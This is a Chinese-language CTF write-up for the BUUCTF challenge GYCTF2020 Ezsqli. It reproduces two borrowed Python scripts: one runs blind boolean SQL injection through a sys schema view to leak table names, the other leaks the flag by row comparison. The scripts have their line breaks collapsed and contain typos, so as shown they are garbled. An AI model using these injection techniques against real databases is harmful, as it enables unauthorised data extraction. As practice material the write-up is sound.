54，【4】BUUCTF WEB GYCTF2020Ezsqli

进入靶场

吓我一跳，但凡放个彭于晏我都不说啥了

 

提交个1看看

1 and 1=1

                                                                    1'#

还尝试了很多，不过都被过滤了，头疼

看看别人的WP

竟然要写代码去跑！！！，不会啊，先用别人的代码吧，后续一定去学

第一个代码爆出表名

from turtle import right
import requests
import timeurl = "http://..........."
table_name = ""
i = 0while True:i = i + 1letf = 32right = 127while letf < right:mid = (letf + right) // 2payload = f"0^(ascii(substr((select group_concat(table_name) from sys.x$schema_table_statistics_with_buffer where table_schema = database()),{i},1))>{mid})"data = {"id": payload}res = requests.post(url=url, data=data).textif "Nu1L" in res:letf = mid + 1else:right = midif letf != 32:table_name += chr(letf)time.sleep(0.2)print(table_name)else:break

得到表名  giers233333333333333,f1ag_1s_h3r3_hhhhh

第二个代码通过表名爆出flag

import requests
import timeurl = "http://........."
flag = ""
i = 0while True:i = i + 1letf = 32right = 127while letf < right:s = flagmid = (letf+right) // 2s = s + chr(mid)payload = f"0^((select * from f1ag_1s_h3r3_hhhhh)>(select 1,'{s}'))"data = {"id":payload}res = requests.post(url=url,data=data).textif "Nu1L" in res:letf = mid + 1else:right = midif letf != 32:flag += chr(letf-1)print(flag)time.sleep(0.2)else:break

得到FLAG{E6AC8B59-EC60-4BC1-A3C9-C6B770B889CE}

即flag{e6ac8b59-ec60-4bc1-a3c9-c6b770b889ce}

笔记

学习python脚本怎么写